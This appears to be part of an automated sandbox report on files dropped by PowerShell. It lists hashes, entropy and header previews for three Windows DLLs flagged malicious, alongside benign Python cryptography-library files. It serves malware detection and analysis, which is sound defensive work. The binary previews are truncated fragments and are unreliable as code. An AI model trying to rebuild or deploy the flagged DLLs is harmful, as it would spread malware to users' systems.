                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d...N..e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22016
                                                                                                                                                                                                                      Entropy (8bit):6.143744403797058
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:7Uv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Qy0gYP2lXCM:UKR8I+K0lDFQgLa1WzU
                                                                                                                                                                                                                      MD5:E7826C066423284539BD1F1E99BA0CC6
                                                                                                                                                                                                                      SHA1:DA7372EEB180C2E9A6662514A8FA6261E04AC6DC
                                                                                                                                                                                                                      SHA-256:0E18B7C2686BB954A8EE310DD5FDB76D00AC078A12D883028BFFC336E8606DA2
                                                                                                                                                                                                                      SHA-512:55F8B00B54F3C3E80803D5A3611D5301E29A2C6AF6E2CAA36249AEBA1D4FCC5A068875B34D65106C137F0455F11B20226B48EEF687F5EA73DFEA3C852BF07050
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...M..e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17920
                                                                                                                                                                                                                      Entropy (8bit):5.353670931504009
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:tPHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8Ng6Vf4A:DPcnB8KSsB34cb+bcOYpMCBDB
                                                                                                                                                                                                                      MD5:D5DB7192A65D096433F5F3608E5AD922
                                                                                                                                                                                                                      SHA1:22AD6B635226C8F6B94F85E4FBFB6F8C18B613C8
                                                                                                                                                                                                                      SHA-256:FAB286E26160820167D427A4AAB14BE4C23883C543E2B0C353F931C89CEA3638
                                                                                                                                                                                                                      SHA-512:5503E83D68D144A6D182DCC5E8401DD81C1C98B04B5ED24223C77D94B0D4F2DD1DD05AED94B9D619D30D2FE73DFFA6E710664FFC71B8FA53E735F968B718B1D9
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...O..e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                      Entropy (8bit):4.741875402338703
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:sCF/1nb2mhQtkgU7L9D0E7tfcqgYvEJPb:N2f6L9D5JxgYvEJj
                                                                                                                                                                                                                      MD5:134F891DE4188C2428A2081E10E675F0
                                                                                                                                                                                                                      SHA1:22CB9B0FA0D1028851B8D28DAFD988D25E94D2FD
                                                                                                                                                                                                                      SHA-256:F326AA2A582B773F4DF796035EC9BF69EC1AD11897C7D0ECFAB970D33310D6BA
                                                                                                                                                                                                                      SHA-512:43CE8AF33630FD907018C62F100BE502565BAD712AD452A327AE166BD305735799877E14BE7A46D243D834F3F884ABF6286088E30533050ED9CD05D23AACAEAB
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...O..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9686
                                                                                                                                                                                                                      Entropy (8bit):4.705419203585452
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IkRDPyZmiCbebOg5n8znjoqOGFyk:0rskrs9VqJwUbbeSg58zjoqOi3
                                                                                                                                                                                                                      MD5:5374FFDB6FAC8B5D62088FC767A95CCA
                                                                                                                                                                                                                      SHA1:3DD22F2BCF46CC25BCF31812A2F55D5AE0A51E41
                                                                                                                                                                                                                      SHA-256:F312B9728D5B4AB66E87C48AA48A354E209649616397CBBDAA13254CCB580C32
                                                                                                                                                                                                                      SHA-512:DAFDCDD0AFF9D6FB245FD05F3261705FD330141E1E85C59B66ADADD9840A2897C16B6008FC60770690998F7F4C8FC7EDBA9558A427C1AC76B542E68B570C7141
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):938
                                                                                                                                                                                                                      Entropy (8bit):4.770904354494787
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1REL4yNT37rEWAnm1WWLB/qs/qn/HLB/M4LB/1/s/3LB/QVP:l4DQxMB/qs/qn/rB/MGB/1/s/7B/QVP
                                                                                                                                                                                                                      MD5:17D9AB9AB96D9645BD7BAA7403392355
                                                                                                                                                                                                                      SHA1:63DFBC424021764FA0B7BE930C76F99F7D097DAB
                                                                                                                                                                                                                      SHA-256:2F79FA6D217978DB2C5A7CF297E73E555C2100E86FA5B2CB4C1DEFFCCAE353DF
                                                                                                                                                                                                                      SHA-512:E6A62201B77C98236B57E93275C666C03CE6D17DF29380D871DA9F55F9D2C01B4EE1901C8C9A95CB7307FD06CCD9CF9CD6FF768693EB30706F236439B253E0D4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Any, Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2b_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2b_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... digest_bytes: int = ...,... digest_bits: int = ...,... key: Buffer = ...,... update_after_digest: bool = ...) -> BLAKE2b_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2b_Hash: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9692
                                                                                                                                                                                                                      Entropy (8bit):4.695526287194061
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IdU1Uy9XiCJ5bfD5Z8znjJQfzdT:0rskrs9VqgARbJ5DD52zjJQfzx
                                                                                                                                                                                                                      MD5:15839BF6B574D243FAC4F9F2BFF5048A
                                                                                                                                                                                                                      SHA1:15D3F491E7896B4D2E3D23272DEAAA4552ED28C9
                                                                                                                                                                                                                      SHA-256:D411B8680C79B20C0C5AE3836E6538C56A72AB6F40EF9829E5C591C2A748684B
                                                                                                                                                                                                                      SHA-512:22C101617BE1F67D92B3F93BFDA4FD3FFC631B066138DA6B475332B7E2F4E65BFE555730FCE709C355E026C960473F97CB221F989520C0F4CC13C389ED5C7312
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):765
                                                                                                                                                                                                                      Entropy (8bit):4.852088276642615
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBPvIY3MRyaRyLu1ApV2+tCwF5RwW0WFWIZyp4LB/d3/i3/3LB/QVxI:1RE6T3QrEWAnJ1Wr4LB/1/s/3LB/QVi
                                                                                                                                                                                                                      MD5:43A377A44F7A80190635F78E745C64C3
                                                                                                                                                                                                                      SHA1:FDDEC7439E99FF7376364061B817E985EC291550
                                                                                                                                                                                                                      SHA-256:25933F08745028C43450B44E6926A00942023E68BF934D2A4D032B8F9557C251
                                                                                                                                                                                                                      SHA-512:8C087F9A1BFF5B0F48A2B766CB4B81BBEF8D18461C9369C71F4431D90343822099A6DAFD74DA565D53D43131A727228BB8487C8503ADC4573E585187B76BDE5C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2s_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2s_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self, **kwargs: Any) -> BLAKE2s_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2s_Hash: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10838
                                                                                                                                                                                                                      Entropy (8bit):4.690470425917553
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:HJqFQHvo7Ex7UiPymAzr5zkZYewd/3SIzODA/u42MZZFsuKFyR4Aeqt86+:HJYQHvbAzhkZYPN17Zz/HvP+
                                                                                                                                                                                                                      MD5:A3D284556282F4A7EC28D5C4478BC275
                                                                                                                                                                                                                      SHA1:221D1ED9AFB19752F368E351A9C7E0174AA0EDB6
                                                                                                                                                                                                                      SHA-256:4F7813FFC544FFAA03ACF5611948BD992714461D7F9F527C289F8A1BF8BF7AC1
                                                                                                                                                                                                                      SHA-512:4F6F4B394796CF373E37222C3309137803AD73225629398C93E56C0A36906D99A123ED53657E64CB10269978D82C50B5E4B62ED31618300D05B37996FBAF9D78
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Hash/CMAC.py - Implements the CMAC algorithm..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =============
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):852
                                                                                                                                                                                                                      Entropy (8bit):4.7944416507058545
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RM7CNyT3xFFAo6atxyW1W2oILB/jHV/PtN/Iqw+y:c8ihh+2VB/B/PX/Zw/
                                                                                                                                                                                                                      MD5:2932E4BF5ECDFE63B31A60E94D12EF3D
                                                                                                                                                                                                                      SHA1:369E08734F3A29B7D68FC99B87C20DCE2945A6C7
                                                                                                                                                                                                                      SHA-256:8A9787A689F900E660207C419A0C2B66D3D40DB46D09F4EA9C19543640D26F57
                                                                                                                                                                                                                      SHA-512:723E90748E13290619B03A767ABE5F040149F42E36F6899648F8F450D9297EAC9F560ADBBB1EDCAA2410DF428CBBCAC55D311E6657704B5CA593707CD3496556
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, Dict, Any....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class CMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... ciphermod: ModuleType,.... cipher_params: Dict[str, Any],.. mac_len: int, update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> CMAC: ..... def copy(self) -> CMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...ciphermod: ModuleType = ...,...cipher_params: Dict[str, Any] = ...,...mac_len: int = ...,.. update_after_digest: bool = ...) -> CMAC: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8407
                                                                                                                                                                                                                      Entropy (8bit):5.035787090665381
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:5J0YDqrYJALrYJHdt3EHGuIWi8Ex7McVGed7VobGKZMidLQBrR8ba/jVtbOixcSr:5JLqrskrs9t3q/IOcVGlUiwNRSqzneYl
                                                                                                                                                                                                                      MD5:45E64CED7762812351E8C9C95A9B61E6
                                                                                                                                                                                                                      SHA1:288E8C269F9C827F779FFAF596F43D7C6BDC4F73
                                                                                                                                                                                                                      SHA-256:BD15C5F9573F25BE1D886BCA6D867D1727B9CC0D515DAD6A3920663F0E308B5A
                                                                                                                                                                                                                      SHA-512:7F09128F28FF3116B63861F0E45BA9B47D87047ED70F844ADB45FE62236E3D440824AB30CF42C073FD23EE61403C60F9712C3B99B2358C362771588306F4DEE7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# HMAC.py - Implements the HMAC algorithm as described by RFC 2104...#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAI
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):649
                                                                                                                                                                                                                      Entropy (8bit):4.783061054533155
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1Ro8s7REYB6IvIY3YcRyTkpYRyc1AQ2ZcQ0WrQwgcxW5RwW0WFW2orULB/Q0WHQ4:1RM7C8T3xWFAlrVxW1W2oILB/SH+y
                                                                                                                                                                                                                      MD5:14A386A671119C5A919A33425DBB267C
                                                                                                                                                                                                                      SHA1:938FCE9D2F2D8D12B4E6DCE66CF634F0597E79C5
                                                                                                                                                                                                                      SHA-256:C2C617969E9C441DCC4F844E9B8BA9767F49999272C239BDE88D5F4FAF6A672C
                                                                                                                                                                                                                      SHA-512:99637CA962FF596AB9A740A3360DCA5989F0CA1DBC23C90926A213FC50A3E7A5FBC92DDDA0C62625FAA9A273CE9D6D50BFAC8A9D812BEC12DA2AD8CFE1D6D141
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class HMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... digestmod: ModuleType) -> None: ..... def update(self, msg: Buffer) -> HMAC: ..... def copy(self) -> HMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...digestmod: ModuleType = ...) -> HMAC: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6136
                                                                                                                                                                                                                      Entropy (8bit):5.061284508996332
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:MMDqrYJALrYJHdt3EHGuIWEirJ6vEjHPL4rSgLT2MniHOFEugEjfJQ69t65F:Nqrskrs9t3q/IAtSniHYnCK4F
                                                                                                                                                                                                                      MD5:750FEFA0D416A913EC431BEA35540FB6
                                                                                                                                                                                                                      SHA1:97110ECDFD1027489B533C12CEE13EACF7D64FBD
                                                                                                                                                                                                                      SHA-256:0D2F99D8A5420B8497BF7B3DF0CF867960350E1C8DF3D2B2C54B8EFA3E79DC06
                                                                                                                                                                                                                      SHA-512:EB481EDA9EAFE393FEA60545F694AB4A200A33F97BF3507013FD0C49B662A5DCFDCA126504C25307875363CC77C9EF3FC9C1200FD820CF4AE823D5DD3E37442E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                      Entropy (8bit):4.361612751830179
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                                                                                                      MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                                                                                                      SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                                                                                                      SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                                                                                                      SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2984
                                                                                                                                                                                                                      Entropy (8bit):5.271333499360497
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2i9JuEAnxxh2wGl6mDxcUROfnSO6dk3:MMDqrYJALrYJHdt3EHGuIWi9Ju5JQ66E
                                                                                                                                                                                                                      MD5:4C127D2E6931ADECC12630F60962585C
                                                                                                                                                                                                                      SHA1:F8FE3D8D9368DA64101BE8F833B19825B16AD062
                                                                                                                                                                                                                      SHA-256:CDA06D88F0C0F2E04F94189B7534522326FC0161941B2BBD4E28D76FFB792D92
                                                                                                                                                                                                                      SHA-512:6FEF5C0A0171A98E51473666D9D1512F6BD93A03669B4BDD4E4598F2294BE2B7624C7639379446062BF9A767F1EF4A2BF81B69E1215C1E67BB7752512BA68D50
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):236
                                                                                                                                                                                                                      Entropy (8bit):4.806129043337596
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                                                                                                      MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                                                                                                      SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                                                                                                      SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                                                                                                      SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7400
                                                                                                                                                                                                                      Entropy (8bit):4.848790386264137
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Nqrskrs9t3q/IM6pj06gdE0Tq5/JPTZxl:krskrs9Vqzwj0XzeL
                                                                                                                                                                                                                      MD5:2695B49F9FBDEB3851E868EAFD4D544F
                                                                                                                                                                                                                      SHA1:6C161A44ACED1A1ABCFF8C08BFFD01CCDC0C79F3
                                                                                                                                                                                                                      SHA-256:9FDD8A5A1134B3F4D88EA11E1057F8494E1129EAE2C1F5425717F91BE1A650BD
                                                                                                                                                                                                                      SHA-512:4B89F0AE402F93A19A3F091D11AC50717DA994B2C6993E0F5831018D3061BEEEB58081D839130E12B6DA37FE6AAF4AFBC80B285F22E2CF71B7CBC273FE2EA0A1
                                                                                                                                                                                                                      Malicious:false
